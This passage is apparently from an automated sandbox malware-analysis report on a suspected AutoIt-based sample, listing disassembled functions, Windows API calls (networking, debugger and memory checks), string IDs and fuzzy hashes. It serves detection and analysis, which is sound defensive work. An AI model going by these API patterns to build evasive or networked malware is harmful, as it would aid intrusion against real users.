                              • Sleep.KERNEL32(00000000), ref: 00892AC8
                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892AE1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                              • Instruction ID: cd4bc45ed203dd63084109a171acdfb235f55660e428d87c69c80ea0b3fb06a0
                              • Opcode Fuzzy Hash: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                              • Instruction Fuzzy Hash: 4F515671428B449BD320BF54D886BAFBBE8FF84314F56885DF1DA810A1DB308529CB27
                              Function 008E99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0088506B: __fread_nolock.LIBCMT ref: 00885089
                              • _wcscmp.LIBCMT ref: 008E9AAE
                              • _wcscmp.LIBCMT ref: 008E9AC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscmp$__fread_nolock
                              • String ID: FILE
                              • API String ID: 4029003684-3121273764
                              • Opcode ID: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                              • Instruction ID: b55f01638af0bd5ee055ca729b58c93fc5fa7bc337d282cc8dcf741fd316a279
                              • Opcode Fuzzy Hash: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                              • Instruction Fuzzy Hash: 9F41C871A00659BADF20AAA9DC45FEFB7FDFF46714F000079F940E7181D6B5AA0487A2
                              Function 008F2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008F2892
                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F28C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CrackInternet_memset
                              • String ID: |
                              • API String ID: 1413715105-2343686810
                              • Opcode ID: f3f735488eb1d8602e48b02bb1727ab8b8b7b8213752f0ea3bae275082fd9ceb
                              • Instruction ID: d7d51b3dddbbf6a0c00f27f2c0a7431c9b70616b4f20b0d18da2b614af90e11d
                              • Opcode Fuzzy Hash: f3f735488eb1d8602e48b02bb1727ab8b8b7b8213752f0ea3bae275082fd9ceb
                              • Instruction Fuzzy Hash: D8311971904119AFCF11AFA5CC85EEEBFB9FF08300F104029F915E6166EB319A56DBA1
                              Function 00906CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?,?,?,?), ref: 00906D86
                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00906DC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$DestroyMove
                              • String ID: static
                              • API String ID: 2139405536-2160076837
                              • Opcode ID: b006c1694fb6ba77dcf31bf46b6328ac5f48bd606871798d9712cc52c1962740
                              • Instruction ID: 09b0de5e23dcddd2ad21882fc3c78f839e016efdc68017fb3698498fe28e4ca8
                              • Opcode Fuzzy Hash: b006c1694fb6ba77dcf31bf46b6328ac5f48bd606871798d9712cc52c1962740
                              • Instruction Fuzzy Hash: 1D314C71210604AEEB109F68CC90BFB77ADFF89724F108619F9A6971D0DB35AC91DB60
                              Function 008E2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008E2E00
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E2E3B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              • Opcode ID: 0de746576e8d701d3af642887b5ab4920c6a6cffb5624d8cde0396eeaba53315
                              • Instruction ID: c7e31bbc4700930934bc04927a92f3b841bf5624d1e9f36bad94056eacc9540a
                              • Opcode Fuzzy Hash: 0de746576e8d701d3af642887b5ab4920c6a6cffb5624d8cde0396eeaba53315
                              • Instruction Fuzzy Hash: 1C31F53160035AABEB34CF8AC845BAEBBBDFF07350F140069E985E61A2E7709940CB11
                              Function 00906943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009069D0
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009069DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                              • Instruction ID: 304606a0a8aca825db1306215ff216c39dca75e835ab8d5315d839ff8b887197
                              • Opcode Fuzzy Hash: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                              • Instruction Fuzzy Hash: 5D11C4717002096FEF119F18CC90FBB376EEB893A4F114124F968976D0D7759CA197A0
                              Function 00906E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • GetWindowRect.USER32(00000000,?), ref: 00906EE0
                              • GetSysColor.USER32(00000012), ref: 00906EFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                              • String ID: static
                              • API String ID: 1983116058-2160076837
                              • Opcode ID: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                              • Instruction ID: 9afdffde1efe0fa4cb2cb6489b05f83cc806158ddfd9eb156b66fede5b2440c9
                              • Opcode Fuzzy Hash: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                              • Instruction Fuzzy Hash: 1721567262420AAFDF04DFA8CC45AFA7BB8FB08314F004628FD55D3290E734E8619B60
                              Function 00906B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 00906C11
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00906C20
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                              • Instruction ID: 75aa8e16dc1c6d460a8e8c0f54ca314947c3d63a794e1104517712e7c8f5ce11
                              • Opcode Fuzzy Hash: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                              • Instruction Fuzzy Hash: 1A119DB1104208AFEB104E649C45ABA376DEB45378F104724F9A1D71E0C775DCA1AB60
                              Function 008E2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008E2F11
                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2F30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoItemMenu_memset
                              • String ID: 0
                              • API String ID: 2223754486-4108050209
                              • Opcode ID: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                              • Instruction ID: e6bbc177319bea2ad55c50e7de54a64fbc04fcd14a14ad2ed0ca88664ca51b6a
                              • Opcode Fuzzy Hash: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                              • Instruction Fuzzy Hash: 2A11D0729152A8ABDB34DB59DC04FAD73BDFB03314F0800A1E944F72A0DBB0AE048792
                              Function 008F24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F2520
                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2549
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Internet$OpenOption
                              • String ID: <local>
                              • API String ID: 942729171-4266983199
                              • Opcode ID: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                              • Instruction ID: 5f685dfd66b93a11b747174bfa0fcb121145ea7eb278ddcab1c5b95ffb077be4
                              • Opcode Fuzzy Hash: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                              • Instruction Fuzzy Hash: E411A3B0541629BEDB24CF618C95EBBFF68FF19755F10812AF60586040D2705991DAF1
                              Function 008F80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008F80C8,?,00000000,?,?), ref: 008F8322
                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • htons.WSOCK32(00000000,?,00000000), ref: 008F8108
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWidehtonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 2496851823-2422070025
                              • Opcode ID: 4c058ab7b57403df31144a825b38674631284abc55a016607e78bdc5fdda7072
                              • Instruction ID: e84b4757a84b73ede6a06cec3d551c4a367263ac0642cbf31da4684d217c5ecf
                              • Opcode Fuzzy Hash: 4c058ab7b57403df31144a825b38674631284abc55a016607e78bdc5fdda7072
                              • Instruction Fuzzy Hash: 36118E35604209EBDB24AF68CC96BBDB368FF44324F108627EA11D7291DA72A8158796
                              Function 008D92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D9355
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: d09d5ad3c15933b7519bd7e38ffb836124072db4b502a9523f5d5082d4bd3b0b
                              • Instruction ID: 676be7fd9fe7de035c65042f7807d84af8682b96e54f056ac5ac8b52eae803a6
                              • Opcode Fuzzy Hash: d09d5ad3c15933b7519bd7e38ffb836124072db4b502a9523f5d5082d4bd3b0b
                              • Instruction Fuzzy Hash: AD019271A45218ABCB08FB68CC918FE7769FF46720B14171AF972A73D1DB3159088751
                              Function 008D91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D924D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: 48700e66397b11815f6225dbe9dc14f4638da62b4be4d11cbe6b75ce90228ab5
                              • Instruction ID: 9d9a4b41da3daf3cdc487dec8005b54da7583c0ab07e321717e7ece7dea908d0
                              • Opcode Fuzzy Hash: 48700e66397b11815f6225dbe9dc14f4638da62b4be4d11cbe6b75ce90228ab5
                              • Instruction Fuzzy Hash: EB018875A411087BCB14FBA4C992EFF73A8FF55700F140116B952A7281EA11AF089662
                              Function 008D9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D92D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassMessageNameSend_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 372448540-1403004172
                              • Opcode ID: e5f46394847a43eb733ebecb2901b6462c482ed2899959e773fb159560a4094a
                              • Instruction ID: c3f3563ddff2a0bccfa8ba4cfe7850a188941f35e67a77ca6ea5f598dea1bc96
                              • Opcode Fuzzy Hash: e5f46394847a43eb733ebecb2901b6462c482ed2899959e773fb159560a4094a
                              • Instruction Fuzzy Hash: 6501A771A8110877CB04FAA4C982EFF77ACFF11700F240216B952E3281DB619F089672
                              Function 008E51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClassName_wcscmp
                              • String ID: #32770
                              • API String ID: 2292705959-463685578
                              • Opcode ID: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                              • Instruction ID: 4e44c615ecb08de06a035f6cd8698e41521db2cfe0e428f25dfbdda11a26c415
                              • Opcode Fuzzy Hash: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                              • Instruction Fuzzy Hash: D5E0D17390432D1BE7209A999C45F97F7ACFF56771F000167FD14D7050D6609A458BD1
                              Function 008D81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                              Download Yara Rule
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008D81CA
                                • Part of subcall function 008A3598: _doexit.LIBCMT ref: 008A35A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: 0aeead267bf87c5696b8d24389f8dcd41bfb6397c29aea0c2daf8c14015501f2
                              • Instruction ID: 3dc44904de06decd5431954904960159419bd29fa18a705dc0642bc77b9fb6a6
                              • Opcode Fuzzy Hash: 0aeead267bf87c5696b8d24389f8dcd41bfb6397c29aea0c2daf8c14015501f2
                              • Instruction Fuzzy Hash: 7DD05B333C572D36E61532AC6C0BFC67648DB05B55F004016FB08D59D38DD295D142DA
                              Function 008BB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BB564: _memset.LIBCMT ref: 008BB571
                                • Part of subcall function 008A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008BB540,?,?,?,0088100A), ref: 008A0B89
                              • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB544
                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB553
                              Strings
                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB54E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                              • API String ID: 3158253471-631824599
                              • Opcode ID: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                              • Instruction ID: 52c460caf7609b61b02a14f4c4cb6e798336a50e8f127e1fe0c0e940173e39ac
                              • Opcode Fuzzy Hash: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                              • Instruction Fuzzy Hash: 81E039B02147118ED330DF28E5047827AE0FF00754F00892CE456C3750D7B4E508DB62
                              Function 00905BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                              Download Yara Rule
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00905BF5
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00905C08
                                • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
